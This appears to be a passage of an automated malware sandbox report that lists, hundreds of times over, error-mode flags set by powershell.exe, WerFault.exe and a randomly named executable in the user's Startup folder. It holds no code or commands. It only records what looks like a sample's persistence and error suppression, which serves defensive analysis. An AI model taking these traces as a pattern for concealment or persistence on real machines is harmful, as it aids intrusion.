Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
